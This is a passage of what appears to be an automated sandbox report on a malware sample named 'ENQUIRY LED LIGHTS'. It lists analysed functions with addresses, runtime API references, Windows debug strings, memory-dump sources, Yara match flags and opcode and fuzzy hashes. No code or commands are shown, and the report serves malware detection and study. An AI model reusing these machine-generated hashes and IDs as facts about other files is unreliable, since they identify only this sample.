                                                                                                  Function 00449601 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __getptd.LIBCMT ref: 0044960D
                                                                                                    • Part of subcall function 00447C6B: __getptd_noexit.LIBCMT ref: 00447C6E
                                                                                                    • Part of subcall function 00447C6B: __amsg_exit.LIBCMT ref: 00447C7B
                                                                                                  • __getptd.LIBCMT ref: 00449624
                                                                                                  • __amsg_exit.LIBCMT ref: 00449632
                                                                                                  • __lock.LIBCMT ref: 00449642
                                                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00449656
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                  • String ID:
                                                                                                  • API String ID: 938513278-0
                                                                                                  • Opcode ID: 3a194968ec576ca77c5c457a859cb4756bb2335ef2628ded8de72e88b7a7d02a
                                                                                                  • Instruction ID: 4cafbfafc8bf6d6698c8d8377ead9047e82e494391d8f76b985cd27b3b3b2b33
                                                                                                  • Opcode Fuzzy Hash: 3a194968ec576ca77c5c457a859cb4756bb2335ef2628ded8de72e88b7a7d02a
                                                                                                  • Instruction Fuzzy Hash: F8F01D32949A10AAF721BFB69887B4E76A06B00728F25414FE405663D3CB6C5D42EA5E
                                                                                                  Function 02F3F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02F802E7
                                                                                                  • RTL: Re-Waiting, xrefs: 02F8031E
                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02F802BD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                  • API String ID: 0-2474120054
                                                                                                  • Opcode ID: 80eaffb3734863246ad47290815aea3047869aafba2a3255230022e4d9624041
                                                                                                  • Instruction ID: d0f9b90882d367999ec47440b837a576ad296aabde66e22530cffdbafbfc012d
                                                                                                  • Opcode Fuzzy Hash: 80eaffb3734863246ad47290815aea3047869aafba2a3255230022e4d9624041
                                                                                                  • Instruction Fuzzy Hash: C6E1C231A087419FD726DF28C884B2AB7E1BF45394F140B5DF6A5876E1DB74D848CB42
                                                                                                  Function 02F4BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • RTL: Resource at %p, xrefs: 02F87B8E
                                                                                                  • RTL: Re-Waiting, xrefs: 02F87BAC
                                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02F87B7F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                  • API String ID: 0-871070163
                                                                                                  • Opcode ID: 5ab5dc50ad5e6593878a0239f92981f8cbedf0696a2f1157f96abfa6d6d4797a
                                                                                                  • Instruction ID: 54cdd2f88943f2e4cf21a7cce4f16d7046f542785d659f53344e749821d33299
                                                                                                  • Opcode Fuzzy Hash: 5ab5dc50ad5e6593878a0239f92981f8cbedf0696a2f1157f96abfa6d6d4797a
                                                                                                  • Instruction Fuzzy Hash: E941C235B047029BD720DE25CC40B6ABBE6EF84764F100A1DEA5ADB681DB71E8058F91
                                                                                                  Function 02F4B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02F8728C
                                                                                                  Strings
                                                                                                  • RTL: Resource at %p, xrefs: 02F872A3
                                                                                                  • RTL: Re-Waiting, xrefs: 02F872C1
                                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02F87294
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                  • API String ID: 885266447-605551621
                                                                                                  • Opcode ID: 41018b40a02fe489b098f9887c6b722994080ecf5e1c7a98a442f0f80b52f990
                                                                                                  • Instruction ID: a6992aef7ed6df55e3a64a9950fea60fa255a32f556da44e1204da7a488e36de
                                                                                                  • Opcode Fuzzy Hash: 41018b40a02fe489b098f9887c6b722994080ecf5e1c7a98a442f0f80b52f990
                                                                                                  • Instruction Fuzzy Hash: D8412536B00202ABEB10EE24CC41B66F7A5FF44798F200618FB55E7680DB70E841CBD1
                                                                                                  Function 02FC2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___swprintf_l
                                                                                                  • String ID: %%%u$]:%u
                                                                                                  • API String ID: 48624451-3050659472
                                                                                                  • Opcode ID: 9f71f6d08b5dec51c8c0a9ad91ba4ec4ce156410b726e8c6fe947714826a9cba
                                                                                                  • Instruction ID: 4fc9726bd0c0575e29c33dd2d7414129b18f898311b548a021988a71105add98
                                                                                                  • Opcode Fuzzy Hash: 9f71f6d08b5dec51c8c0a9ad91ba4ec4ce156410b726e8c6fe947714826a9cba
                                                                                                  • Instruction Fuzzy Hash: 14315472A002199FDB20DE29CD40BEE77F9EB44694F54459AED49E3240EB30DA549FA0
                                                                                                  Function 02F57D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __aulldvrm
                                                                                                  • String ID: +$-
                                                                                                  • API String ID: 1302938615-2137968064
                                                                                                  • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                  • Instruction ID: 9bf4906adc59d21698b72805b98c1f8c96e96108cbb3285bc83e5dd813f7dc5f
                                                                                                  • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                  • Instruction Fuzzy Hash: 9391C571E002269BDF24EE69C8807BEF7E5AF447A4F14461AEF55E72C0D7308981CB90
                                                                                                  Function 02F19126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $$@
                                                                                                  • API String ID: 0-1194432280
                                                                                                  • Opcode ID: 39f706265e019ca9aba421d1a0ac6382b154df68fdc14337b77d4a4c9d159b67
                                                                                                  • Instruction ID: 0627b99ecfa7539baf96110b5f14406ff60597f5bd04148281253706cbfd38cd
                                                                                                  • Opcode Fuzzy Hash: 39f706265e019ca9aba421d1a0ac6382b154df68fdc14337b77d4a4c9d159b67
                                                                                                  • Instruction Fuzzy Hash: 9C811B72D002699BDB25DF54CC54BEEB7B5AF08794F4041EAEA19B7280D7709E84CFA0

                                                                                                  Executed Functions

                                                                                                  Function 041523A9 Relevance: 26.7, Strings: 21, Instructions: 478COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ?$ T$#$%$'L$(8$+$,)$7|$8$=<$>$$A$A$A;$B$L0$aQ$l$uA${e
                                                                                                  • API String ID: 0-1129630295
                                                                                                  • Opcode ID: 18c8ce129e7e3aaf46d89082c89ecf584c65dd9011e005b201da7f30a4ab65f9
                                                                                                  • Instruction ID: da52f394d9b5d66cbfa998e32fb0a321b11356b30878f7b2d6fa3b663cb4e77a
                                                                                                  • Opcode Fuzzy Hash: 18c8ce129e7e3aaf46d89082c89ecf584c65dd9011e005b201da7f30a4ab65f9
                                                                                                  • Instruction Fuzzy Hash: 844205B0E05269CBEB28CF45C884BDDBBB2BB44308F1085D9D41A7B390D7B96A85DF54
                                                                                                  Function 04160019 Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 6$O$S$\$s
                                                                                                  • API String ID: 0-3854637164
                                                                                                  • Opcode ID: 96693173f966a1d94fcadd0e1a74972931cf3b723436fa6e5395f12137dcecf7
                                                                                                  • Instruction ID: 5b4edbde9215553054c572e4ba0c752ad5269fedf2297ec4b48c7c1b4d64edac
                                                                                                  • Opcode Fuzzy Hash: 96693173f966a1d94fcadd0e1a74972931cf3b723436fa6e5395f12137dcecf7
                                                                                                  • Instruction Fuzzy Hash: 1851D2B2D01119ABDB10EF94DD88FEEB778EF44318F008199ED0997141EB71AA14CBE1
                                                                                                  Function 0414BDE9 Relevance: .1, Instructions: 130COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1768b4900a74c24f9fbcf28b8188d55eb2d6fc363956d61b0901fd40f8f0011a
                                                                                                  • Instruction ID: 9c2bb870846f1e40aaac1198e3c9d55e74849f3ebf82f515b206c01276f1fd52
                                                                                                  • Opcode Fuzzy Hash: 1768b4900a74c24f9fbcf28b8188d55eb2d6fc363956d61b0901fd40f8f0011a
                                                                                                  • Instruction Fuzzy Hash: AA41F1B1D11219AFDB14CF99DC81AEEBBBCEF49710F10415AFA18F6240D7B4A640CBA4
                                                                                                  Function 04170F99 Relevance: .1, Instructions: 101COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c801b236e75bb4bc9b37aa594bff612af0ec2f3c0d3abe5d97e1b87ca7553daf
                                                                                                  • Instruction ID: 54b97144c7b17abd5545083a124d93d5852e3d8bb774f7f31a2cc02a07b98e8a
                                                                                                  • Opcode Fuzzy Hash: c801b236e75bb4bc9b37aa594bff612af0ec2f3c0d3abe5d97e1b87ca7553daf
                                                                                                  • Instruction Fuzzy Hash: F831A2B5A10208AFDB14DF99D881EEEB7F9AF8C314F108249FD19A7340D770A951CBA5
                                                                                                  Function 041710F9 Relevance: .1, Instructions: 93COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2f68a037fb149db10700f6fbf5e475ea70ead0067214abf062199d4d96e50e10
                                                                                                  • Instruction ID: 1cea64e5d2cd546395d00d7fb21fb81235e917c618b686dd968846c220de3e5b
                                                                                                  • Opcode Fuzzy Hash: 2f68a037fb149db10700f6fbf5e475ea70ead0067214abf062199d4d96e50e10
                                                                                                  • Instruction Fuzzy Hash: CC31C5B5A00208AFDB14DF99D881EEEB7F9EF88714F10814AFD19A7340D770A951CBA1
                                                                                                  Function 041709D9 Relevance: .1, Instructions: 85COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 516a940df03a26b368f8ef161336e4fadfbd5bb43ae4e305ef2300638a3812c3
                                                                                                  • Instruction ID: f602354451575fcdf1bb8b3f66bfad9c0e8c314560c08cd038807354bc2289c6
                                                                                                  • Opcode Fuzzy Hash: 516a940df03a26b368f8ef161336e4fadfbd5bb43ae4e305ef2300638a3812c3
                                                                                                  • Instruction Fuzzy Hash: B231F8B5A00208AFDB14DF99DC81E9FB7F9EF88304F10814AF919A7244E774A911CBA1
                                                                                                  Function 0414BD7C Relevance: .1, Instructions: 83COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b44d62cfeba9b54d8fc9f84aba184dfc9161ee89931b739a84adc97c6477f11a
                                                                                                  • Instruction ID: 8d6698271b204b879abccf7cacf3e73ba8b363366cd385d93bc8882b0f247492
                                                                                                  • Opcode Fuzzy Hash: b44d62cfeba9b54d8fc9f84aba184dfc9161ee89931b739a84adc97c6477f11a
                                                                                                  • Instruction Fuzzy Hash: 4C216DB2D142199FCB10CFADE8845DDBBF9FF89724B10859BE868E7210D371A6418F90
                                                                                                  Function 04171319 Relevance: .1, Instructions: 77COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4eff7b74b5b776a88b0de0443151fb520d86f5b3bb47fd9f9af36f2f8b9fe277
                                                                                                  • Instruction ID: 02acafce61c23edfd9e94c4b274fdd93fe35e61a011524ec78032e8c6bb6a7a3
                                                                                                  • Opcode Fuzzy Hash: 4eff7b74b5b776a88b0de0443151fb520d86f5b3bb47fd9f9af36f2f8b9fe277
                                                                                                  • Instruction Fuzzy Hash: 3221FFB5A00609AFDB14DF58DC81EAF77B8EF88714F10854AFD1997240D770B911CBA1
                                                                                                  Function 0415FE59 Relevance: .1, Instructions: 75COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d9f18d692d3ad3e7a6a64be56fa072bf89685dd877dadecd5eb97da991b33a31
                                                                                                  • Instruction ID: 5fdc02c8dbacab4e4d714fd051134f199a85c1059ac59e7e039961aec4a52890
                                                                                                  • Opcode Fuzzy Hash: d9f18d692d3ad3e7a6a64be56fa072bf89685dd877dadecd5eb97da991b33a31
                                                                                                  • Instruction Fuzzy Hash: 2F1156B2380309BBF7209A559C82FAB776CDB84B59F244015FF04AA2C1D7F5B81156B5
                                                                                                  Function 04170669 Relevance: .1, Instructions: 65COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bf8de32b226212f05a9b4b2bbf921aaac7e55553739f096382ee27d737f5cbb9
                                                                                                  • Instruction ID: 593df8b3f5b32a6e7a20b1d75dd95fccd8e85383b3c79c6064727bc4e2c89a9e
                                                                                                  • Opcode Fuzzy Hash: bf8de32b226212f05a9b4b2bbf921aaac7e55553739f096382ee27d737f5cbb9
                                                                                                  • Instruction Fuzzy Hash: 6D110DB5A50305ABE610EB68DC81FAF77BCEF89614F10854AF91967240D7707A1187A1
                                                                                                  Function 041707E9 Relevance: .1, Instructions: 65COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 62a741cf33bd3495662b45f2d9a3e8e15fa154a7a98b9a41785ed301f86ffa50
                                                                                                  • Instruction ID: 64cd0845db5f5a53c03789d4ffcd895aa276d4f0afce21e7e6444b54e429c072
                                                                                                  • Opcode Fuzzy Hash: 62a741cf33bd3495662b45f2d9a3e8e15fa154a7a98b9a41785ed301f86ffa50
                                                                                                  • Instruction Fuzzy Hash: 6B114FB1950348BBD720DB68DC41FAF77BCDF85614F00854AF91957280D7707A11C7A1
                                                                                                  Function 0416D8B9 Relevance: .1, Instructions: 65COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 33304a698d0be848f4b1e5bd7d98632e21fb064d3ec2128ae18e0b0deb515c3e
                                                                                                  • Instruction ID: 597f31a28e32b6add3ef0375d3ad7012a8098e79281139fff7cdd61008a9081f
                                                                                                  • Opcode Fuzzy Hash: 33304a698d0be848f4b1e5bd7d98632e21fb064d3ec2128ae18e0b0deb515c3e
                                                                                                  • Instruction Fuzzy Hash: B52103B6D01219AF9F00DFA9D8419EFBBF9EF88200F10416AE915E7200E7706A15CFE1
                                                                                                  Function 0416D3C9 Relevance: .1, Instructions: 65COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 875bf6b1e5f26f1a9a15df02ae0a09ca5cb8fc141c694996b2485ade3f2b7012
                                                                                                  • Instruction ID: 8bfe003b49162ea8cb8d929623b6eb34e1e84c8b4f29e54df334ad5812e029d6
                                                                                                  • Opcode Fuzzy Hash: 875bf6b1e5f26f1a9a15df02ae0a09ca5cb8fc141c694996b2485ade3f2b7012
                                                                                                  • Instruction Fuzzy Hash: CD21F1F6D0121CAF9B00DFA9D9418EFB7F9EF88210F14415AE919E7200E7709A15CBA1
                                                                                                  Function 0416E709 Relevance: .1, Instructions: 63COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4b9afb912764b904411f17f77d1b2b46a621f600300256f6f0bdbff6779bfef5
                                                                                                  • Instruction ID: d37999ddd043f6eadd392f346f42d5b23dc1c1aa6823b9b44a24346f7af213e8
                                                                                                  • Opcode Fuzzy Hash: 4b9afb912764b904411f17f77d1b2b46a621f600300256f6f0bdbff6779bfef5
                                                                                                  • Instruction Fuzzy Hash: D311E2F6D1121DAF9B00DFA9D8419EFBBF9EF88210F14456AE915E7200E7709A158FA0
                                                                                                  Function 0416E019 Relevance: .1, Instructions: 61COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bf25db738f595c1deeaf45e6cf8f23d96115af6a22cae5be23bd99193bbbd3da
                                                                                                  • Instruction ID: ce940c776d42d16f16df8cdd07b6583d285a182700b75d29171bb7699306e1f1
                                                                                                  • Opcode Fuzzy Hash: bf25db738f595c1deeaf45e6cf8f23d96115af6a22cae5be23bd99193bbbd3da
                                                                                                  • Instruction Fuzzy Hash: 5811E5B6D1121CAF9B00DFA9D8409EEB7F9EF88210F14416AE919E7200E7705A05CFA0
                                                                                                  Function 04169639 Relevance: .1, Instructions: 59COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 39b8017c62be71a335f6390589f08bde4432edaad7a4ee143269fc650c3c38c3
                                                                                                  • Instruction ID: 1c763ef4b90c3d910ce44814b7fa0cd3ce248ffec52e018602d042830c88e062
                                                                                                  • Opcode Fuzzy Hash: 39b8017c62be71a335f6390589f08bde4432edaad7a4ee143269fc650c3c38c3
                                                                                                  • Instruction Fuzzy Hash: 680140B6A41218ABE710AAA4DC85DEB736CDF44614F100296FE28D7241FBB0BA5186E1
                                                                                                  Function 0415FFD0 Relevance: .1, Instructions: 52COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dca3e677e5e95d6e767de2fc9d14673199151e96ece32b3bb1ec9d68a5ebb9a9
                                                                                                  • Instruction ID: 367b4a317a0c67ab910f15721ecc8de4d04795824b4bdd56150f6ffacea9a582
                                                                                                  • Opcode Fuzzy Hash: dca3e677e5e95d6e767de2fc9d14673199151e96ece32b3bb1ec9d68a5ebb9a9
                                                                                                  • Instruction Fuzzy Hash: 6901F272610208ABEB08DBB4DCC2FEE77A8DB45710F4442A9FD18DB2C0D736F6558691
                                                                                                  Function 0414BDDA Relevance: .0, Instructions: 48COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b6b4a6b344d8da35dc86dc90d1531af1a605ee18a1239af6f182c0d79e7a83de
                                                                                                  • Instruction ID: 3e817b22757b2b8f8d74ae83071e7a10e1a655140887572027d2d73f81478c15
                                                                                                  • Opcode Fuzzy Hash: b6b4a6b344d8da35dc86dc90d1531af1a605ee18a1239af6f182c0d79e7a83de
                                                                                                  • Instruction Fuzzy Hash: 2E11C9B1D21229AF8B54CFAD99845DDBBF8FB4D721F10855BE928F7200E77096418F90
                                                                                                  Function 04171689 Relevance: .0, Instructions: 47COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 84e4f580c2f966e9f9b07fc989e96498ad32f0c506480f3c6e51f6e36c57b017
                                                                                                  • Instruction ID: 5fd0985b4bff09da6530a4308f482741c492f408b605d960e71454f4ac1e94f2
